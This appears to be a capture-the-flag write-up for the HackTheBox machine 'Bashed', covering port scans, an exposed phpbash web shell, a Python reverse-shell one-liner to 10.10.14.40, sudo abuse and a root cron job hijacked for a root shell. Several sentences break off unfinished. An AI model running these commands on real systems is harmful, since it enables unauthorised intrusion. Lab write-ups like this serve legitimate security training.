```
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 1000 -p- 10.10.10.68
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-20 11:38 EST
Nmap scan report for 10.10.10.68
Host is up (0.052s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 17.34 seconds
```

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p80 10.10.10.68
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-20 11:40 EST
Nmap scan report for 10.10.10.68
Host is up (0.053s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds
```
Only port 80 is open, so let's check that website.
Well, the webpage looks like a blog and it only has one article, which talks about a tool called phpbash. This tool provides a semi-interactive web shell to the machine and, according to the article's author, he developed it on the same server that is hosting the page.

The article contains an image that seems to reveal the location of the tool in the /uploads directory, but it is not there. Since the author said that he developed it here, I tried something like a /dev directory and it worked! This directory not only has directory listing enabled, it contains the
Getting a reverse shell
After some trial and error, I was able to get a Python reverse shell using:

```
python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("10.10.14.40",8000));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
```
Now we can just upgrade it to a full tty. The user flag is under
Once on the machine, I tried some basic enumeration commands, and this is interesting:
```
www-data@bashed:/home/arrexel$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
```
www-data can execute commands as scriptmanager without a password, so we can just execute bash as that user to impersonate it:
```
www-data@bashed:/home/arrexel$ sudo -u scriptmanager bash -p
scriptmanager@bashed:/home/arrexel$
```
I decided to look for all the files owned by this user with:
```
scriptmanager@bashed:/scripts$ find / -user scriptmanager 2> /dev/null
/scripts
/scripts/test.py
/home/scriptmanager
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.nano
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout
/proc/10983
/proc/10983/task
...REDACTED...
```
scripts folder looks promising, it contains a Python script and also a file owned by
test.txt. Looking at the script, that txt file appears to be the output of the code.
It looks like there is a cron job executing the script as root, because the file's creation date is updated every minute or so. Since we can change the script, we could get a reverse shell as the root user by changing the script content to this:
Now it is time to spin up a listener and wait...
```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 8080
listening on [any] 8080 ...
connect to [10.10.14.40] from (UNKNOWN) [10.10.10.68] 42738
# id
id
uid=0(root) gid=0(root) groups=0(root)
```
And we got a root shell! The flag is under